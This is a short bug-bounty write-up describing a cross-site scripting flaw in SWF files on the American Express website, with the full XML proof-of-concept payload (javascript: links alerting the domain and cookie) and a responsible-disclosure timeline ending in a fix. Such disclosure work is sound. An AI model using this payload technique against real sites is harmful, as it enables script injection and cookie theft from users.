Exploiting XSS in SWF on AmericanExpress

Last month I was playing with some Google dorks related to SWF files, when I found two interesting files on the domain www.americanexpress.com.

The SWF files took a URL parameter pointing to an XML file. This file contained the information that the SWF processed and displayed.

First, I checked that the SWF allowed requests to external domains. Then I only had to replace the original XML with my own XML file.

This XML contained JavaScript that would execute in the www.americanexpress.com context.

I used the following XML file:

XML as PoC

```xml
<main>
   <settings>
   </settings>
   <top_options>
      <option id="0">
         <title><![CDATA[Proof of concept 0]]></title>
         <body><![CDATA[<a href='javascript:alert(document.domain)'>Click me (domain)</a>]]></body>
      </option>
      <option id="1">
         <title><![CDATA[Proof of concept 1]]></title>
         <body><![CDATA[<a href='javascript:alert(document.domain)'>Click me (domain)</a>]]></body>
      </option>
      <option id="2">
         <title><![CDATA[Proof of concept 2]]></title>
         <body><![CDATA[<a href='javascript:alert(document.cookie)'>Click me (cookie)</a>]]></body>
      </option>
   </top_options>
</main>
```

Finally, when the user clicked on the option "Click me (domain)", the JS code executed successfully.

[Screenshot: XML loaded]

[Screenshot: XSS executed]

Timeline:

  • 2 Nov 2017 - DM via Twitter to @AmericanExpress
  • 6 Nov 2017 - Response from @AmericanExpress
  • 6 Nov 2017 - Report vulnerability to email contact
  • 6 Nov 2017 - Response from security Team
  • 10 Nov 2017 - Vulnerabilities fixed
  • 17 Nov 2017 - Reward bounty received
  • 14 Dec 2017 - Write-up published